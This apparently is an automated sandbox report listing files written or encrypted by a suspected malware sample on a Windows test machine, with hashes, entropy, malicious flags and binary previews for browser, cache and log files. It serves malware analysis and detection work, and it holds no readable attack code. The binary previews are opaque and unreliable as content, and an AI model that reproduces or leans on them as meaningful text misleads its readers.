                  Preview:.{.....'.bt~m....]`..AuD..=...Q!......2..K.u.">h...|l...I...*...T.)l......|..T.nW.O~.J..6..T..+'...^..oR.... lH..e.#Q,.JD...=g..LT8.....Y(y*...2.jN.$2:..Ff..G....^f>..C..>....b..q=..).{'oX..@....t]..k..8..j..e.....(.d([)..&;..D?..I.`.<?."?iO.sZP.S..5....._Bt..n.QW.(.VC%..O.K#......L_...).iS...U.+wu.uNM^k......K%.e....0.Q=.:..:.+..FHM59..t:-...a..[..t...R....!W.........c...j..........L..=.?..{%[.\........ @.t.&E.h......R.i.!......>.....@.....74...lO.qo.H........gi`.F.Sc..*ny....K.i..p..?...V.......9..rn&c<...4.:..DBq.U%......d..e+.q.b......o..r!.8a..k%..+....eu..L4Z.....<./.U..z..L...v...I...J..|a.....@Ja....a.v..J.DG_..bV.........#.......6|.`r'.(.....6...`..w..U.)....2H>..`/.<..._.jk.,.@..v8...R..+%...h"k.k..V...V..).E9..GRl.....Cbx...4..1..m...f..x%#.F..B.F|.|...+j....?...M..H..^..8$..4."J6....2.*........Q..7..kGa...t.T..#.YH..Nv..~...M.U.aAb.....S...2.e..Mh_@..`51Fz.(vI{..Y....."..c."..0...wd.....QR\.u.C4-n.\.....+...j....k.z..W.2

                  C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user.cdpresource

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):388
                  Entropy (8bit):7.329614808928156
                  Encrypted:false
                  SSDEEP:12:uq7ZamWlUHGzLWZ3rhZqk/w4R36Wcii9a:uq+aAWZ39vYM3zbD
                  MD5:ED2149905A41E284BE1EBD1EC0450CC5
                  SHA1:33A7402BBAC406C025A21DC35A52EB59F424FEF8
                  SHA-256:583D747C5E4CD4D5BFDC68F512A74F9110905CAA8818421402BBF7F4C85D1559
                  SHA-512:185E457F2DB9F7BC9C1688248C28ABD4E2C85228598E59D0B57ADC5C2D2F6743E09AF954859627C854B42BC3B9D19BA7DB954D1054B5CF25F021B4F20577F89C
                  Malicious:false
                  Preview:.{..R...h...3.5...]<.E.7...B*.A%D.L.D.!.I.....&......0M...S.>.....5.c[.94b.J.....7{c.D#Oh 0W..H=Z.10..i.k?w:....$..#......q.....JD.o..n.;...F.l..|p.V..O.jOl...3T.(@H3.ZH...R.A.|k."F..G....&."........Y4W.\...C..kpFW@.y1......a5.r.H/.d..p,r.J$Il..:.cmNp...T.......U...2K .y.^.....ZL2d....>...ei0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\AppData\Local\D3DSCache\f4d41c5d09ae781\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):65886
                  Entropy (8bit):7.9969456712218445
                  Encrypted:true
                  SSDEEP:1536:OJwGlm0mVw6Yb58uOvuaTGfDCp1aoqWnZoktA4YHn0XywNfLNacuwln:mlmTVw6YbOu8uaTG70NqWZoktCn0X7V5
                  MD5:CD024FCA6A540C5035A6F3D7F6EA083F
                  SHA1:462486D1E9C4EFBE5C33C31B8864F14A56889CDC
                  SHA-256:DB6022CF7A71CB79D72FEE6709BC47FE522EB225950CA8CA6BBA5B144BCCE145
                  SHA-512:3C09ED49FDCDBBE24B93196E2161BD6469F8641D6AFC4A74AC0E099BDC10D1936F94C3648DED05A3DA57A3BDFE26B98A9377F1CB3EA6B891D06BB51159B499DB
                  Malicious:true
                  Preview:...S.W..g...5o...F...w...........c."w.\FiF.j2.l..G^..n.........f.I-...G..a.........)}.g....y..\.*.B.........S5|...."........|.Se.:.,...MC'....d*..:.-..c..U!.s.X+g...F...\.-..H..{;.D.gT...|+.H....kl..J&........../..bW.*.[.....}...T...1..L5...B...g....).n...Q..7..a..\t5....p.._H.J.{MoAO....R.8..Hx;...\HEk...N..}D......e.1cB...E|M.Z'.....7..s..h..<.........*#.....D...C.2y.I.YQ;.}S.=..S.v'.~.;.5..<..N..g'..b..bR}.'%5...|t,Q......a....u.1.\..,.2.\.lV....RX.&...,..b.|.0..."..m..V...S.u.%..<Y.p...aG..p.2..Z].>8.....N].:=..Y>:....W.#p.IK`z.;'p4.[4!......,F9.w.X%....:.Qo.i......#`.$Ek'.q.Wd..!3^....it.<xS..8.h...O........n......S...D......D..(Cb^....!3g.].....ij ...I'.".....N..ur.`...3...3I..q'u....../CoX..&+......Bg.x.R....Q.K......../(.....5.I.....t.w._...<.3.h...;~.H.......{J.....4.R#..wh.Z...[>Onz.P:+..V"....B@X......^GN+.vA.U..4........XvV3..l;.{...}. .e...Kg..q..a%G=.C.f...Q.h...Psl..Y..`X..&8.^....R.-tw.<....o* .I..'Hk,(.D>.K.x..}FC.;......&)e

                  C:\Users\user\AppData\Local\D3DSCache\f4d41c5d09ae781\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.30265110633749465
                  Encrypted:false
                  SSDEEP:24:WNP7waVdCqsUFmbtiYrjJKL8qlLOrDvR3SYbP3MfR50vsKV+qrr95+3zbz:swqCq1EiEn9Db/M54xV+0g3nz
                  MD5:B5BF8A1BBDA1F51E33B43D7B1C8B4992
                  SHA1:7C1352F6B0E3F38F6F180F946C0DD02D56683E5E
                  SHA-256:845E8FBF65CB00BFC1687B68283BBC0A00454FCB5358F9059B5840620C37CFC5
                  SHA-512:F95D400BE5BEFFDF2C3E7D829656B7CE439D9A7C2042875F46829344F8580D0575E1BA8C56C9E606AEA8E49614F4B48C8991ACC24A7CFBDC817963DB13F2F542
                  Malicious:false
                  Preview:.....N..........&p......UEUD/.cH..=...JL..`0.H.>....g.Y... ._.k..`#W\Q.).'.,./.5>.-...x)...2I....B>o..K...d....r2...].!.=.x..o f...>..P]x.y.....q"-3..!?"3.r3h..".@.. ...'....3f[n".. &8..cyL.`.#p....S.h.>.{.J.Cj.E.e....M@.......hK....D.~...K.[BW%......9r.p^.)m)..OP.#.v3.O&.....h.N....{.oJ...:...&....@.....t...x....Pjm..k..'.R>.M.t.......;'8............H..s[...\.U...n|.....E....d..IO.&Z..Z...js(Z..c...x3....|........+..$_...q.Uh.#...BA&......|...5...Q..t.G...<..UC..._.;.Z...^.5)@k....vH.f.M..F..X..**3-.F.MQ.......kk.3.j...c.T.E.Rih.hv/u'...{S.....X?.^Y.K.......s..<(.ZG..[[.d,.............L.....#v.....[.M......}>........:_C.!..DTn....JnS.e26V.Gg..^..J.`.r..~%`0.......k....<...l6.... 6$..~....=.>{Ic....Xz4...p'.f.s..ldt.8.d.....$.a..Z*.i........b...[......T....`.|..u.."g=..LA.N8..Mb....Pl(....?#S..O...kQ.P.I.!.K.M.0.......A.q.h..B.['].UD....(..5.%.....5..[..o.1..To...;...x`.M..ZY..........4.g.Z......f....V..&1..|..xU.....4....X.t..\...&.>gp.Q;+P.`

                  C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):49486
                  Entropy (8bit):7.9964193425401255
                  Encrypted:true
                  SSDEEP:1536:+D2layppaCGzVIBn0nsfuVgjFGGtHeid0/:SoaypGhIBn0s++tHs
                  MD5:F86D9EA6791C5F8D13DC96B5C38890BA
                  SHA1:468DF4AFEB879448681CF2895D8C4A82CA9B26CD
                  SHA-256:7057B341CFDFE02171EC3205647B84AFF86D3624234C98B404198A9E25EB9753
                  SHA-512:CCEBC93C248262CD645713DC1EE1C13E69C6972B0F2E79D96917B22975109A53B79DE38D87CC84C38C1A5E575998E38B2773E30EBC0F1E27A883966D97E93C0C
                  Malicious:true
                  Preview:SQLit..V.c....p*....`."..m.e......K.qs.P...A..i...Y......ne2l*@.........,^..bW)U,i.(wT.......g9.HV...k.v9...8.........X.u.w>)....../e.^...2...mD...C7d..../.Y....H|..E2.GY.TSA|.*.,..O....R..(J?.U.....F.........y.s (b7...)..F..[..x(..-z.y......@....&......Wx.h._4.f.N...x.\".;E......R{.7.!&.t..x`.,....(....o.....qm}a...v....}_..ZU>.H...k=&..';..S6I.E..O.Ix.....9.....r.k.Mr.V..r..~..lG....W&..m0..{>..<........wE.[f.ys>..|.F#.`..F.Y.<.7t**z>...e.|C.^...;..!....@...".37z..a.......u.e:.E.L.<...]..o"m.y....)7.ks.^L..h.y"l...d.......[...Q...G.p.o.w/.U..v.zp-...pE..|@.u....q_.H..*.vI.cLz.k..............^2....U\`.R..b."..6n.B..r.....K....Ho.i..5S..a.....V..A....I.."H.....%}."N+Z.../..h.V..#y.....u.-.T....R...U.~.@.yZ..".5....{.......T..8.<L..+.H.....^.3]p.....P..<.9.s....P.-......:...P.n.!....[.UE.mHh....l3.......-.D...P.....7q...fzU....h...5....yO.T...5O..,....=.?kM...7<...n:.k."z.1.#..|wWk.{...../8....".%.b~.3..GY...PfPE.....W...7-/_

                  C:\Users\user\AppData\Local\IconCache.db

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):11317
                  Entropy (8bit):7.981933074079892
                  Encrypted:false
                  SSDEEP:192:eUNsdq4Ngexj1S4ZyqEX+Fj381BDEeG1ZefXAGPH8VlA+DU3ke3llMYFQJ2Qa1:cdq4NgeJg4ZyvX+FLSTnwGPcVlto00My
                  MD5:8DF26E218FD39F5A4D994FAA32C1E25A
                  SHA1:75504488642FA4FE0F13C3122A0A34DDCAEEB851
                  SHA-256:C6741D8685EBAC535475430FCDD1D4049E1C66A8E1D29C3AD67B27389009189E
                  SHA-512:35F2B9A593D23A472610300886774682CDE021F982D3A9D9E4F1E9AF2B91832118F01963CAABDACCED4F1202FD03013A162171038A2E85C6D3D04833EF9D9E29
                  Malicious:false
                  Preview:H...WR...zC.d.(=....7.Y..p..V..ra.U.rc.9nQ...l^.ibd..#q.n.M...KOa*...... ..nR.t........ )............x.x.VB3V....v....+...l.0.........1>vA.....3.Hg.b.>d..{........y.S..f....m..9..Vh.q..O...>....@......@#.]..D.3........~2.?.....M...$!.(...u....@.4...clu..L.8,....N...f@...).....u.s ...h=...;g.N....C..<.....W...gO.r.1..G...Tx..e...@..x'..<...R.7....c~q.._...........B.U.duu......m0>}...`....N.b..."....l.N.3gn.......b.Y..Zu.\.k.%..Y.u..0!.l.u..K...og.....U.~.h..l.2..b..kY.e....<*Qs..^j..K.y.t.+\.d.g......k..c..uB5...|.U.. .....O..)_...!.y@Q..k.G.0....Z...L.D...T.d.0YB8.}.D..C(k...W..4..,......q3...m..2...*....p...]:.?q..iA..O.y!H...Z..*r..F.c4L$f?.y.V.%.....Zh..^..@.....].._}...y6.4k.M.[@/1m....j..:..ic.....O.W.. ...........J........M...$.d.`)...n.3.5@,.+..,.*.&#g..;.....3.... .../$.........wP....*.g.o.....AW+..9y....:.=...cB.I}:pkS...E........I..*.W..k..F~.L..![...&.G.q.UG..>..~_|..Tf.R.}+.u&X0^9....,k...|...Y..FB..l.......o..N)4.ZY.I1.a....

                  C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\unarchiver.exe.log

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):354
                  Entropy (8bit):7.315507192943234
                  Encrypted:false
                  SSDEEP:6:Qbj4ZZywmBz1wGOk8x9+HvsFXKMyUG4Nh225sPZ3Ssr2o9S7Ij+3vK7yjOsVolWL:QHKZ0zLOk8u0DGYglPZ3SXo9SDi7E36Q
                  MD5:DBD6E9ACB7B2D675A5BAE5EF28200BB6
                  SHA1:C21E38BCFCE721A30DA5C91E3C82E1DCC31C4877
                  SHA-256:17AF23B6583AE8C5DDCD42FCB3AFAE8FEBE8E045174455AE4EC979673C60B2C1
                  SHA-512:CAD8732078764F8D859BB0D761D0E6194E5BE9DC062D86B475826BA9542842B0473D5F3BA8C26C19CFFBD771ED9B1BB71446B63CB89A5D3D692357F4F7B3B2CD
                  Malicious:false
                  Preview:1,"fu....g$.h...6..q<.4....x.z.s9x..l..@G5.P.u.r.....G?$v......Y!g.D...s$.m.s....].!:.|.........?a..,.$R..K.g.2X.......9....X.9_..A..c...w.......R.*I1...&...1...L.I..*W.%.u.....b..r+|0.vH.P.PD..Nar......h.M. ....2.9.p..+w.\..~.jm5.b...+x.......'[.?...f.....kgi0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\InspectorOfficeGadget.exe.log

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1554
                  Entropy (8bit):7.876600449835291
                  Encrypted:false
                  SSDEEP:48:DIFxaNI7EGHwVeUZZxIQk6/qRVmcdgwomRd3nD:8DaQ3UZZxj9/Vcdg7q
                  MD5:5C20840E2849147E944177C8BB7BE746
                  SHA1:05B34A4AE3879A5B7AFED6AD1C475C09AEA3A75D
                  SHA-256:89D642A4FFB4DC2837BF718173F6D20D73F584A664055CF17FB057F9C8CD32FC
                  SHA-512:8A2DA564B14A75D8F7961155DCE23D49A828B90975199D061F992EA2B62480B7DD9B114E9229449332B0BEBE41274D428A2DD09CA445959AC22021AC376D564F
                  Malicious:false
                  Preview:1,"fu_C:.d.{.w..QI.<7n=.k.aM.s.U&.#..V....qT..m.Z.Qo.p"..9X.f..r.KD.o..'.....).....M.V.y...N...^..A.Si.)i..?.;..\...-%I[.;b.............L..S.~......AH......\..S./.B.85.:f.a.[v@G..w.O...L..g)........w.tC#E.T.}..(......{...._.X.1...@...X0.U... .U6Z.oh...)..+.Eb.Cx.8R.....w5..}..T..c.^Z.G.5../..3...1C.Q.5i-.B#>.M.G..c.b.6...1t..;0E.b.~.?..4v..M-S...u...5_.}.u.;..c..w....v.....[J..=.p].K#..}.V:K}..>..yk0."..mt.T...q..SN......C...7...V.\~/BW!Od...q..n!.O.....".q..P.....1....J.Le....S.....E1.....M2.s._.....!....=~...g.-.O.zh.I.x....eh.\..g.+WRe!...T...p<H..g..."R.....I@..c8a.+m.9....A....,..=.k...?...c.'.......=.d.B0....z......m..d......~..........{F-....P.Pc.....O;"...;.f&.......RT.G.}.R.(hG..l=so..'.0h...k<7.......gy..=..U+B] .......~.....L..(la.j...~..R.w!i5)E....*...d..\d3...y)@..c[..j....L...O$[..a.`.@f...e.........Q.r.X].T.z.....`_5Q..r..=..".xi..T..........j.*ZL1.7.aEy;v.....o..cl..4.....z.m.8.H[...Y..%.......z:.C.q............U].....x./..T

                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\LocalBridge.exe.log

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1952
                  Entropy (8bit):7.878598094830672
                  Encrypted:false
                  SSDEEP:48:ZPGXSbkLaktzmRiyYy389fNrSpe9Lk0RrFn6w3nD:ZOpntLRlh40RrJ6K
                  MD5:EB3137F3CDE567C0F125854E8BF54D5A
                  SHA1:DFBF7DE5FB4EA0D9A8FEF0666CFAEBEF87DBDC74
                  SHA-256:C168D40D30D5589594A4300031314BEAF7F4C3E24EF187696624E50516FD949B
                  SHA-512:20A401C44096F386D87A3489D6EFC635F7AB67E60D8379D6A9A84BB1ED7F05F1A21116ECA92FAF2C6296637AF0510AD2735C657C228D992D24B4AC5D4122B7FB
                  Malicious:false
                  Preview:1,"fu......2.&."..>..UT.M.C..T...sm.....+&.;...g........#......t.~.y..b|..2.....`.bH.<..?..K..%..L#9...0.WZ.-X"......I..5.np...>..l...>F.Eh..1k.l.....G..v&.S.7@..BfY6=pod.b.Hc.....=wN......)Du.....[...{J_/=..C..r..~..q...5.....4..J.pZ.......A...q.g.z..5.t`8z.+..'....}..I....].I"."n..%c..s..~/......R2..N.-E..r`..I^~:. ..S.s..>..FN?P.u..+...{k.]..$%.../^P.......1pk...@.s`h....z......&.."`h]..$.KZ<J[.m.`...........{^...{.5.........zB1.s........M7.s..@.H...K.g...B..j-...m.;._.&.s...W..."..A.....Q.1br9?.......l..,<..._\.)=.....q....q.f.....l...\.i...;.!...N.\./......&..a.?e..kx......VH..)C....L...6.~..CRVW..?.D$_/TA......s..D.#8.r..SF......Sgy..x.H......A w..[.!....F<.P.b..i.D....0..G/?n............A.-htO..>j.~.S.$..y.\w7.3.E...JI.7s..6.....4.o..-.^-...h.....H....;.r..+.../..H.....)...k...7........i.-..T..0..#...F......1y.[@..<..."...x)#5.&.<.....7?\..PVc...Q.8AZ)E..%...V..#.. ..?.zN...).....r.........S.wu..f....N}.O.._.T.Y.z...._!W.G....x....

                  C:\Users\user\AppData\Local\Microsoft\FontCache\4\CatalogCacheMetaData.xml

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2203
                  Entropy (8bit):7.92824706152312
                  Encrypted:false
                  SSDEEP:48:4DGephXbJzwrd7yUg1m0M9zxKax/kbhevdnYIW/qNs3w6g3nD:4D7h+RyUgQ0M9z4aCb7D/qNs3W
                  MD5:95C0621F0BD51779F6F8F2F909EB3067
                  SHA1:64E831CF4047216C384C3432206C54E1970C0DA2
                  SHA-256:7B770EBDD38DB7005C0750DFF918FC9D4DEF1283675AD7D3DE7E4BB478ACBD1E
                  SHA-512:3EA6EE30DFAE214B644812200A799D0F85C679D3C260CA932BBF88F6687F896A20ECF9D72C04EC4D5B83D5E5EC58B5A3BAD76470B97F43920E8394B9E5220ABD
                  Malicious:false
                  Preview:<?xml3.&.............-......Q..{...76.H4..a..t.....o=:...)..~h.E..z..........Z.k..O..o.z..'......N_#..i.f....;\=..c.l.H...7.#<..T.....G.Y1:.'?.........g....E.or....K....C......E.H!#...\-."...$.......K.z..+p,...P*...%..!.....@3..(19.og$..mY"....t..x8P.3.6......!V.O%.6n.2.k....,=.O9J...X.X..T_.a.,....=..$f....YG.'.N".....y..~.S........7;..#..!0....W.'....c......../*9..<$Y<R.{v._..*60..B..i.,cr.....]....n.]...."....K....ua...?....c..-..kx..eD...2...T....Z...{0.7........"..[..H.,.S..1.o.S....yuH\..RW.Wz......Y#...l. .=.......7.g:..[.h..\..F...v.Qb?....... .p..Dh4.s|..b.....D.....X!...[...6..#@.."..-...|.hfO..r...x.k.>Fw....`;.d..r....c...~..pp..F../J...\,.2;..\.ID.."...O.....*.id.3..~.JK.(.g2.:.A.d;P......;.V)G.Wm&.}.M.w0.*cg^_..1.....Y....$....h.d..h...\*M....82*.7.W~ s...)t.U..r....|....Jx0(....a..z.n.B..!i./s..0.>.Zfp.s&..{...c.VMN.j...^.T.........;R{\.n......O.....bUU.f..1V1.t'z....>.....b1q.GD.Z.<....q...r..~T.....u."K...}....R..!....a..p/

                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\CacheStorage\edb.chk

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.975255187887271
                  Encrypted:false
                  SSDEEP:192:B4iShWP7qI4ieeIzDuGBArYbtF4qxV6gHrJcEF8Fu:W/hWjqEeewuG2SxV6tQ
                  MD5:C432A6E5E8DCAD54CDEEE0571D5659DB
                  SHA1:60F7A6C018C652242393840AC4FADDC63A4E3D8E
                  SHA-256:9813A49FECE2FA12F2D710C0433C2C0536DE79241F7CE999662610C5C637130C
                  SHA-512:1841D4CCF3017410A8FFB9F5924EB1C68C627914DA137E6B40F485F1C537E4DA6621A561F561CBF4677CE13FA5670474BBC3D183E59A6095712487B3E07C13F6
                  Malicious:false
                  Preview:.._.\..O^....R.!...#....|3...9b;....Y.u....R.......-p.....%.......l``...+.e.R....'...6S..:\.(..5...C......Q.q...`..l.\...~.....Q.....R)....T....i..>....Q.v.v.CR.c=.....yuj<..._...7*2$.H_...F%.h..9......3..,.J..18.z...s....).I\=..X@y.%WO..Y.!.TJ....?..!.'.3..ioR...........^p.A.-&g.=.u..`..~.z.O.)....9.O..K..8Y`.Y........v.Yh..a.t..1;p..D......w.[....L.p..aS...|.;.....){|S.f.....u.|B.....%.H..=.T.....#... ........^...}.2.H1.Zv..<l... .]...S~O.E9..w@..:J./.=.D.-..W.2Zw....C.W ..E...u.sb-...3|.!.C..M...N..A.#..ouq.[S..*..y...bRM.tL..P..%.....lD./1....Z.QJE`.C........~..PG...+...)..7h.:.w..2..3..u....v*xv.........".p....V...6]?..OVl..W4i.]..DnY...*..lV..u.d.7...b...Q.<P.S.X..<h.)9W..Ij.t.3...akz..@...dhT...|.......G.^.....x..j.8.o=4.(S...z..%7$.....n8......Wi...r......Z.......C...~.kP..H......!...!......Y..+..6'.L...<..b....5N.1`0.,3]..k.K.@FAs..1{........E...U....$.i..k.Cx.&...!8B...C.t..)..'V..P..a/.3.,3.d.]...7.Y...Cq

                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\CacheStorage\edb.log

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):524622
                  Entropy (8bit):3.9527894204933647
                  Encrypted:false
                  SSDEEP:3072:tl+7o+1eRuqTK4vVfO59hnAbnIPjh/9+ruvcWQrz2hrVFv/tuSEOuSqvfrfVgDXC:PeTgTb5O7JAo/PvDQrz2h5FHWOuSqfh1
                  MD5:1C06CFB474C061BE18FD1D10E29B10B8
                  SHA1:E888F9C2161D46DAB5B6FEC26C3B7F644FD5326D
                  SHA-256:DB9F5A34176DFC85113D2A7EE1382A498842FDE9E556B5A232DDBC3D5D6ED266
                  SHA-512:6AB0624988BA26A6575E519F395087011F5C50A11C601034BDCB5DF6655C66D5BEACC72A02D0FB90C98744956DF2DE04142954367F2A0186EFB3327E44638501
                  Malicious:false
                  Preview:cy7..*.|.dX..A..X......hc......._.!....D.5~..b..V.}>..x.=.E..E*.......s.S.N....v7#.`.....s*".A.XHi....3%E.. mv......pj.g...i..LV.<..V@....f.......y..k..y.../.Y... I....N2...5=........-.T..><.B..x~....j..$__A.n..x....f.....X..'...C.@..Fp...Y...Y.k.E.)~@>s.......~l.p.t.aO..e.1a6.....u9.E4vc+{0..w.>.P.Z..8&...g..u......o<.{.F....NDL.6q.>(<...W.9......Z/?..%GmC...Q_i..w..>l...3.>...E.T.O..y..\.).sxO.Ue.A(....S.......I...g...../G.........o.6.[..p..*.~._..O..f.0.Ff..%.n.a...Zv.D....:.......;5e..M.7".)..j....m.`.m|....K0#........^]..*.*g....&.KK...-.%,.R'..s....I....3.....?. .F.M?./".J$vc.I....;.--j.iZvh.@....o...1m....u....)d.....T..*6.FDl.;.].*...QJa.^..@....f2em. f.....JE0..?....R8..W....;...S..E.F.dy..&b.T....<,..s..P.-_.........E.{..gX...@".z...]=.\.d{...'TuB....M........,.d."$..2+P.8.z)...(;f..Dl..].M4.8...7....n....B..3.$.(..n.Q.e.T.G.R..}...~...d..*...Y....H....o...g...u..c............8}.fB......h.g.y>WX<.y.(7.....{.z..Z.?..z.d.p..V.

                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\CacheStorage\edbres00001.jrs

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):524622
                  Entropy (8bit):3.2080723711352337
                  Encrypted:false
                  SSDEEP:3072:S3tWKlLany1+pA+XG8QCrzB0qHQT/Nml85b+OJ4z3JlVnHdz:QXWyT+rRb0Hb/4VlVnHdz
                  MD5:3A7F9329D54F26CE56F280A153D911C8
                  SHA1:71AD80596DDA06CB4B65D51BFE9F4A7653C90158
                  SHA-256:043D2D5FBF971B47744B33935A5D4C09FBA2429E243A96352E2786989BB3FDFA
                  SHA-512:D3AB20370F70249E5A1A76EF4FB695A54A55171A012570D051584BC8FBF8B67A683B8F29E30F47FE9632C5042DB17BFF7A6DD276A4C0C9393B367E53D23C8296
                  Malicious:false
                  Preview:.....7.A'.6j..+GE.......X....4..hs...*;...A...w...i[o.I..........V.I5.8........).V.^Y......-.p .f....U...A...zO .I......F...v.....H....l.*..c.`?Q>E.....WD..%7..*,+...u.[..:0..*E......RP.z...K..$)?.s..g...1.v...b.as...........Y......._.cR.g..-Gy6.xJ...s.xFB......A/...W."W...g.<..........46.....Q..7+.$.......,n.^.c.....D.3`..KF.O.36t7.h ..P.~..['..J...D.#-9.2Tf.V...W.`..u.'.]..o...j........n...:.B.....Nl.Mr.?...[.....g....W&..G.-X.q.....&..&...`;......_..,!......=.._F...t..;..2`.U.}..W...D.].T'..,%.....H.j......6.6).8....%.8.,.=..T....q.(.{W'..~v...b..p..V1.B.....-..ha...(.g....Z....h.<...z.GE.x..#..:.z. ...B......tt.}.o.s.....S..z....-..>T.'q.."p..<.........HTt.......X..x.>..:.Fv...Z....7i..F..uT.|..Y..R.g..<..1Q.QOg.b.......a..{....ET.D5../j:..j....i....!B.O.4..,....<..!](.y.h.+.=I.......O....gsjL...{....n&S..1.K..w..".vZ!.&.....&a...p0..7..{X..j...&..Sk..K...x....xg...?...M.....O...@V[....F+...x.wfE.\.a..~J'!..._/E....|.....pG...H.Y

                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\CacheStorage\edbres00002.jrs

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):524622
                  Entropy (8bit):3.2070026107324643
                  Encrypted:false
                  SSDEEP:3072:c4pgtJsy3zdfRhXOlBVwxURRVCALH1g6ubUklFCFUEdHIpLST0bEq:cB97XOHGAzj1gUklFcUEWpGTk1
                  MD5:0923DE91D2DA4276A1AC831E04654DCC
                  SHA1:A4C863A343DF52759571191D1213BA0F5D29EB24
                  SHA-256:39CBB5246878DEE215143893223C3BD8F4390CBF097D6244AFE2AABBCD76E7AA
                  SHA-512:2AEFDA6155EAB9722E7C5DCBA1A275309E804336B05C94278C9F3BB7F7B8D209681444DCD134EED707CC7C8ADCDEAAACEB2F0DA7E9AB9092DC039E02A34523E2
                  Malicious:false
                  Preview:.........9..&k..J..z.....j...6...B...|...fVf.$.Q.nIB*..i. -.uM9..`!d ._*...4......K.X.c]kGz......<....(.L..........r.|$;.....@^0}.%.'..@...D.=..Y..b..k,D..M.sy.1vD..E..`.N......c.Z..qfi.Pa-.._..9G..8....0...'...!,A.6.pH(F}sL...,.....o7.._J..Is.C...5+hj..t....]..*%.7UA..:.8..q..y...c..3Zgp..\...m.....9}.>.F..&...&...l.*....D<.!.{../........tOI.+. N..q..HJWAF......?!.7N..O8.9..R......C.N..88q.V2.9."...?I.`3.:.o'y...@.<..P~%:.../.....,.L...z...`......}.=..#.r+3m..kV..`.1s.'.N.....o.;TKb.4l.....'.0..\'.(fd.|:^.u..b...l...}......(....I.S....f.s.Y.;n.B.&.F.-..^y......y.^..?..J.........?@..M.&bc..okSmuI^..<......c;..8c.r....*.e.....~...q..g....|.."|L.u...Sq..^-.....\.%V>..."...,.(..P+c.'..Z....v+...,...f.....Tv@.|.MHD.W.6....3...?.".F.Y.o.D.G.1.. ....c..|.%....@......g.Y..c...q"c...dp.L..{....I..1vL..Nm.6.].<...A6.....-.....~9h..A......H......j.5-oi.L..8.r...J...t.Y...Dr.....&.....lW.=,..?..8...g..E.x..+I.-3_.y.ys..)8..s....b........;......du...

                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\CacheStorage\edbtmp.log

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):524622
                  Entropy (8bit):3.2088213282072804
                  Encrypted:false
                  SSDEEP:3072:d5lIXjk97vXRsiG1YD1oDP+D6BDmp79Fq4lur9mNNiZ7EdSyTM5jY:d5lIzk97vBfG1YhoSl7Jlu5mAEd9M5U
                  MD5:7B9AF6D3327B7199565C429EAF814926
                  SHA1:90738E461538F3D12730A71B238B55DB3F7E5185
                  SHA-256:5702881E5EADB9A7A682754D8A14A83BCA6E68A68655A73C8725247DD36822BD
                  SHA-512:2D88E2DD5578DD2216E2DBA25E6679CFA1AD553F3024A14813BAFFDD61E94E649C6339C27D0923AE446FFE1E3D8A30E1B2AE047261961F9C98311A86C4F90893
                  Malicious:false
